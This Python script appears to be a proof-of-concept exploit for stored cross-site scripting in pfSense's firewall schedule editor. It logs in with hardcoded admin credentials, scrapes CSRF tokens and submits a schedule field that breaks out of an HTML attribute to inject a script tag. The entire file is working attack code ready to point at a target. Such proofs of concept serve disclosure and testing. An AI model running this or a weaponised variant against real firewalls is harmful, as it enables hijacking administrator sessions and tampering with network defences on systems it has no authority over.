#!/usr/bin/env python3
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup

baseurl  = 'https://198.51.100.34'

target = baseurl + '/firewall_schedule_edit.php'

login_data = {
    'login'        : 'Login',
    'usernamefld'  : 'admin',
    'passwordfld'  : 'pfsense2',
}

target_data = {
	"name": "XSS_Test_Sched",
	"descr": "XSS Test",
	"monthsel": "3",
	"starttimehour": "0",
	"starttimemin": "00",
	"stoptimehour": "23",
	"stoptimemin": "59",
	"timerangedescr": "XSS 1",
	"tempFriendlyTime0": "Sun",
	"starttime0": "0:00",
	"stoptime0": "23:59",
	"timedescr0": "XSS 2",
	"schedule0": "w11p3-m3d12\"><script>alert('XSS')</script>",
	"marker": "",
	"save": "Save"
}

headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'}

with requests.Session() as s:
    # Fetch CSRF token from login page
    r = s.get(baseurl, headers=headers, verify=False)

    soup = BeautifulSoup(r.text, 'lxml')
    login_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Login
    r = s.post(baseurl, data=login_data, headers=headers)

    # Find the next CSRF token
    soup = BeautifulSoup(r.text, 'lxml')
    target_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Submit actual request
    r = s.post(target, data=target_data, headers=headers)

    # Dump input errors from response
    soup = BeautifulSoup(r.text, 'lxml')
    input_errors = [errors.text for errors in soup.select('div.input-errors ul li')]
    if (input_errors):
        print("Input errors:\n")
        for ie in input_errors:
            print("* " + ie + "\n")

print('Done')